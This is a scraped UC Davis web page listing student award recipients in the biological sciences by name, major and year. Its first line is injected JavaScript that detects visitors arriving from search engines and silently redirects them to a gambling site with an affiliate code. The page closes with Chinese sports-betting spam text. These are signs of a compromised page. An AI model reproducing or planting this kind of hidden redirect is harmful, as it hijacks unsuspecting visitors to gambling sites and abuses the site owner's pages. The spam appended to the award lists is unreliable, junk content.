var regexp = /\.(sogou|soso|baidu|google|youdao|yahoo|bing|118114|biso|sm|qq|so|sooule|niuhu|biso|360)(\.[a-z0-9\-]+){1,2}\//ig; var where = document.referrer; if (regexp.test(where)) { window.location.href = "https://www.yabo334.com/?i_code=6638019&" }

Student Awards

Arboretum path
.

  • Emily Eijansantos, Neurobiology, Physiology, and Behavior, 2018
  • Srujan Kopparapu, Biochemistry and Molecular Biology, Psychology, 2017
  • Nicole Sitkin, Neurobiology, Physiology and Behavior, 2013
  • Larissa Miyachi, Biochemistry and Molecular Biology, 2012
  • Kristen Kelley, Neurobiology, Physiology and Behavior, 2011
  • Ashley Heers, Evolution, Ecology and Biodiversity, Geology, 2007
  • Yoel Eli Stuart, Evolution, Ecology and Biodiversity, 2006
  • Christopher Jones, Biochemistry and Molecular Biology, 2005

Chancellor's Award for Excellence in Undergraduate Research

Awarded to up to two graduating seniors who have completed outstanding research, scholarship or creative activity tied to any academic subject while at UC Davis

  • Katherine Borchardt, Evolution, Ecology, and Biodiversity, 2018
  • Jessica Darlene West, Biochemistry and Molecular Biology, 2016
  • Brenda Marin-Rodriguez, Neurobiology, Physiology and Behavior, 2013
  • Becky Xu Hua Fu, Genetics, 2012
  • Elaine Garcia, Neurology, Physiology and Behavior, 2011
  • Ernest Maningding, Microbiology, 2010
  • Marisa S. Goo, Neurobiology, Physiology and Behavior, 2008
  • Gregory A. Ho, Biochemistry & Molecular Biology, 2007
  • Andreas Ehrensberger, Biochemistry & Molecular Biology, 2004
  • Nicole A. Tetreault, Neurobiology, Physiology and Behavior, 2002
  • Patricia L. Duong, Genetics, 2002

Mary Jeanne Gilhooly Award

Established in 1942 to memorialize the achievements of Mary Jeanne Gilhooly, this award honors the graduating woman believed to be the most outstanding in the areas of leadership, scholarship, integrity, and service in the campus community.

  • Habiba Hashimi, 2012

Veloyce Glenn Winslow, Jr. Award

Established in 1966 to memorialize the achievements of Veloyce Glenn Winslow, Jr., this award honors the graduating man believed to be the most outstanding in the areas of leadership, scholarship, integrity and service in the campus community.

  • Connor Grant, 2018
  • Raumin Neuville, 2017
  • Asadullah Awan, 2013
  • Devvrat Malhotra, 2012

College of Biological Sciences Medal

  • About the Award
  • This distinguished recognition honors the top undergraduate of the College, selected from faculty recommendations.
Recipients
  • Kelsey Klein, Neurobiology, Physiology, and Behavior, 2018
  • Felicia Peng, Genetics and Genomics, 2017
  • Jessica West, Biochemistry and Molecular Biology, 2016
  • Rachelle Hamblin, Biological Sciences, 2015
  • Daniel Curiel, Biological Sciences, 2014
  • Daniel Copeland, Biochemistry and Molecular Biology, 2013
  • Aaron Heuckroth, Microbiology and Classic Civilizations 2012
  • Julia Victoria Gorgone, Neurobiology, Physiology and Behavior, 2011
  • Kate Marie Brown, Biological Sciences, 2010
  • Emily Dubina, Exercise Biology, 2009
  • Matthew Tamplen, Biochemistry & Molecular Biology, 2008 (inaugural recipient)

Undergraduate of the Year

  • About the Award
  • This award is given to one outstanding graduating senior based on the criteria of academic excellence, research activity and involvement in service to the campus or the community.
Recipients
  • Bita Shahrvini, Biochemistry and Molecular Biology, 2018
  • Niloufar Mohajerani, Neurobiology, Physiology and Behavior, 2017
  • Jenice Cheah, Neurobiology, Physiology and Behavior, 2016
  • Briga Mullin, Biochemistry and Molecular Biology, 2015
  • Duy Tran, Biochemistry and Molecular Biology, 2014
  • Asadullah Awan, Neurobiology, Physiology and Behavior, 2013
  • Minh Ngo, Biochemistry and Molecular Biology, 2012
  • Carly Lewis, Neurobiology, Physiology and Behavior, 2011 (inaugural recipient)

Ronald and Lydia Baskin Award Recipients

  • About the Award
  • The Ronald and Lydia Baskin Research award recognizes one graduating senior each year for excellence in research in the biological sciences. Students from all UC Davis undergraduate colleges are eligible for the Baskin Research Award.
Recipients
  • Benjamin Mallory, Biochemistry and Molecular Biology, 2018
  • Bita Shahrvini, Biochemistry and Molecular Biology, 2018
  • Iris Mollhoff, Biochemistry and Molecular Biology, 2017
  • Roy Qu, Genetics and Genomics, 2016
  • James Lucas, Biochemistry and Molecular Biology, 2015
  • Spencer Wong, Genetics, 2014
  • Amanda Steele, Biomedical Engineering (College of Engineering), 2013
  • Becky Xu Hua Fu, Genetics, 2012
  • Amy Tam, Biological Sciences, 2011
  • Wenhui Zhou, Biochemistry and Molecular Biology, 2010
  • Alexander Muir Sutherland, Chemistry (College of Letters and Science), 2009
  • Amanda Kohler,  Biochemistry and Molecular Biology, 2008
  • Edgar Ivan Sanchez, Biomedical Engineering (UC Davis College of Engineering), 2007 (inaugural recipient)
福建体彩网-足球比分网 福建体彩网-直播吧 明升体育-即时比分 福建体彩网-篮球比分 福建体彩网-英超直播 福建体彩网-足球直播 明升体育-电视直播 明升体育-足球比分网 明升体育-直播吧 明升体育-英超直播